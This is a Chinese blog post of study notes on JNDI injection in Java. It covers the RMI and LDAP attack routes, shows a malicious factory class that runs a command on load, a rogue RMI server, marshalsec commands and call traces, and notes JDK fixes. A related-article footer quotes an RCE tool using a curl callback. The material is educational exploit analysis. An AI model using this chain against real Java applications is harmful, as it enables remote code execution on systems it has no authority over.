JNDI注入学习

最新推荐文章于 2025-03-03 13:04:35 发布
最新推荐文章于 2025-03-03 13:04:35 发布
阅读量162 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/why811/article/details/132669094

通常 JNDI 注入攻击的都是 lookup 方法的执行者,一般步骤如下:

  1. 目标机器中调用了 InitialContext.lookup(URL),且 URL 为用户可控
  2. 攻击者控制这个 URL 为一个恶意的 RMI 服务地址:rmi://hack:port/name
  3. 恶意 RMI 服务会返回一个含有恶意 factory 的 Reference 对象
  4. 目标获取到 Reference 之后会动态加载 factory
  5. 攻击者可以在恶意 factory 的静态代码块、构造方法写入恶意代码,在目标实例化 factory 的时候被 RCE

可以通过 RMI 方式和 LDAP 方式来达到攻击效果。

RMI 方式(8u121 ↓)

利用

把一个恶意的 factory 类编译成字节码,用 http 服务托管:

public class Calc {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
> javac Calc.java
> python3 -m http.server 9999

然后起恶意的 RMI 服务端:

public class EvilRmiServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference reference = new Reference("Calc", "Calc", "http://localhost:9999/");
        ReferenceWrapper calc = new ReferenceWrapper(reference);
        registry.bind("calc", calc);
    }
}

如果客户端 lookup 方法参数可控,则会被 RCE:

简单分析

getObjectInstance:319, NamingManager (javax.naming.spi)
decodeObject:464, RegistryContext (com.sun.jndi.rmi.registry)
lookup:124, RegistryContext (com.sun.jndi.rmi.registry)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:417, InitialContext (javax.naming)

前面几个步骤是解析 url 获取上下文信息(略),从 RegistryContext#lookup 方法开始看:

这里的 this.registry 仍然是 RegistryImpl_Stub,执行lookup方法获取到的是一个 ReferenceWrapper_Stub 对象,在 RegistryContext#decodeObject 方法中会根据这个 ReferenceWrapper_Stub 对象获取 Reference 对象:

先跟进 ReferenceWrapper_Stub#getReference 方法:

在这个方法里调用的是 UnicastRef#invoke 方法,相当于进行了一次远程方法调用(见 RMI 中的 "Client 发送请求"),而调用的方法为:

正好对应着 RMI 服务端中的 ReferenceWrapper#getReference 方法(ReferenceWrapper 实现了 RemoteReference 接口):

于是这次远程方法调用的结果就是返回了远程 ReferenceWrpper 包装的 Reference 对象:

接着往下跟 RegistryContext#decodeObject,来到 NamingManager#getObjectInstance 方法:

通过 NamingManager#getObjectFactoryFromReference 方法获取 factory 实例,跟进该方法:

如果本地加载失败,会从 codebase 处加载 factory,跟进这个 loadClass 方法:

这里通过 URLClassLoader 加载 factory,然后执行了恶意代码。

修复

在 8u113 (8u121)? 之后 RMI 利用方式的默认不再信任 codebase,RegistryContext#<static>

RegistryContext#decodeObject

LDAP 方式(8u191 ↓)

利用

使用 marshalsec 可以快速起一个恶意的 LDAP 服务端:

> java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer <codebase>#<class> [<port>]

恶意 factory 同上,客户端以 ldap 方式 lookup:

> javac Calc.java
> python3 -m http.server 9999
> java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:9999/#Calc 8888

简单分析

getObjectFactoryFromReference:142, NamingManager (javax.naming.spi)
getObjectInstance:189, DirectoryManager (javax.naming.spi)
c_lookup:1085, LdapCtx (com.sun.jndi.ldap)
p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)
lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:94, ldapURLContext (com.sun.jndi.url.ldap)
lookup:417, InitialContext (javax.naming)

最后仍然是调用了 NamingManager#getObjectFactoryFromReference 方法。

修复

VersionHelper12 类中:

VersionHelper12#loadClass

why811
关注
JNDI注入的理解、JDK给出的修复
qq_37432174的博客
11-24 762
攻击目标扮演的相当于是JNDI客户端的角色,攻击者通过搭建一个恶意的RMI服务端来实施攻击。Context.PROVIDER_URL参数表示指定一个远程加载的地址,例如上面的rmi://127.0.0.1:8080,当我们通过lookup函数进行查找对象的时候,其实就是在rmi://127.0.0.1:1099/m1sn0w这个里面进行的查找。当然,如果受害者内部存在漏洞组件存在反序列化漏洞的话,我们可以构造恶意的序列化对象,返回给客户端,当客户端在进行反序列化的时候,可以触发漏洞;
Apache Log4j2 lookup JNDI 注入漏洞复现及利用
Tauil的博客
07-21 1284
这时候有过有过js经验的朋友都会知道嗷,编写网站的时候一般都会使用到JNDI这个接口进行目录服务查询,而JNDI中有LDAP的类,他可以用来执行我们的恶意语句,为了方便恶意语句的回显,我们到。查看网络,重新载入一下,看看每个数据包,诶这个时候就会发现有一个数据包存在参数上传,并且URL是在另一个地址。,为什么不用那个,因为啊那个是上传系统参数的数据包,有很大的区别,感兴趣可以自己去搜一下,因为本人java也不是很精通,所以就不多嘴了。并访问,这时我们的攻击机终端就会收到新的消息,这就代表命令。.......
[Java安全]—JNDI注入
Sentiment的博客
07-08 2773
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
JNDI注入学习(看不懂直接喷,别忍着!)
一剑开天门!的博客
01-13 3482
JNDI注入学习(看不懂直接喷,别忍着!)
JNDI注入详解(自学)
m0_64481831的博客
03-03 1726
Jndi叫Java命名和目录的接口,可以类比为一个字典(就比如用一个目录路径去定义一个文件,目录路径和文件就是键值)。在Java应用中除了以常规方式使用名称服务(比如使用DNS解析域名) ,另一个常见的用法是使用目录服务作为对象存储的系统来存储和获取Java对象(比如使用打印机,在目录服务查找打印机然后获得一个打印机对象)。Jndi包含在Java SE平台。要使用Jndi,您必须拥有Jndi类和一个或多个服务提供者(SPI)。JDK包含以下命名/目录服务的服务提供者:轻量级目录访问协议(LDAP。
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 6465
JDNI注入总结
【java安全JNDI注入概述
leekos的博客,分享web安全相关知识~
08-24 1695
是Java提供的Java命名和目录接口。通过调用JNDI的API可以定位资源和其他程序对象。命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
JNDI注入学习1
08-03
**JNDI注入详解** Java Naming and Directory Interface (JNDI) 是Java应用程序用来查找和管理网络资源的接口。它不依赖于特定的目录服务,而是通过服务提供者接口(SPI)来支持多种不同的目录服务,如LDAP、DNS等...
"深入学习JNDI注入: 防范远程攻击和恶意代码
JNDI注入是一种利用JNDI接口的漏洞进行攻击的技术。JNDI(Java Naming and Directory Interface)是一个用于目录服务的Java API,它允许Java客户端通过名称来发现和查找数据和资源。JNDI独立于底层实现,并通过一个...
一次基于Fastjson的JNDI注入
kali_Ma的博客
11-03 603
Fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。主要特点:1.快速FAST (比其它任何基于Java的解析器和生成器更快,包括jackson)
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
JNDI注入漏洞的原理和复现
Locosomnus的博客
01-29 2330
一篇关于JNDI注入学习笔记
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9796
0x01 JNDI 概述 JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
JNDI 注入详解:从入门到精通,通俗易懂+实战防御![特殊字符]
最新发布
Aishenyanying33的博客
03-03 648
🚀 JNDI 注入 是 Java 安全中的一个重要漏洞,曾经导致 Log4j(Log4Shell)大规模攻击,影响全球数百万台服务器! 本文将用最简单的方式,带你彻底搞懂 JNDI 的原理、JNDI 注入的攻击流程,并提供有效的防御方案!
应用安全系列之十四:JNDI引用注入
jimmyleeee的专栏
03-09 1162
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 如果有不妥之处,希望可以留言指出。谢谢! ...
Javaweb安全——JNDI注入
weixin_43610673的博客
07-21 1531
测试环境为JDK8u111以及8u211JavaNamingandDirectoryInterface(JNDI)是一个和JDBC、LDAP、RMI、DNS。名称与对象相关联的方法,例如地址、标识符或计算机程序通常使用的对象。目录服务是命名服务的扩展,除了提供名称和对象的关联,。在一个实际的名称服务中,有些对象可能无法直接存储在系统内,而是以引用的形式进行存储。引用包含了如何访问实际对象的信息。对象工厂是对象的生产者。它接受有关如何创建对象的一些信息,例如引用,然后返回该对象的实例。的错误。...
JNDI注入原理及利用IDEA漏洞复现
人若无名,便可专心练剑
03-18 2922
本篇文章我也是看过很多的博客写的,中间也遇到很多问题,JNDI注入漏洞的危害还是蛮高的。下面我们从RMI以及DNS协议进行详细的漏洞分析,其中漏洞的危害原因主要是lookup()函数可控,可以执行恶意的命令,从而造成恶意攻击。
05LDAP目录服务
xiejx618的专栏
04-14 1109
LDAP(Lightweight Directory Access Protocol):类似于组织机构图和地址薄.LDAP越来越多的用来作为集中管理组织用户信息的方式,可以将成千的用户分成逻辑上的组并允许在不同的分布式系统间共享统一的用户信息. 为了安全目的,LDAP 经常被用来帮助集中的用户名和密码认证——用户的凭证存储在LDAP目录中,而对于用户来说,认证请求基于目录进行。这对于管理员来说可
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值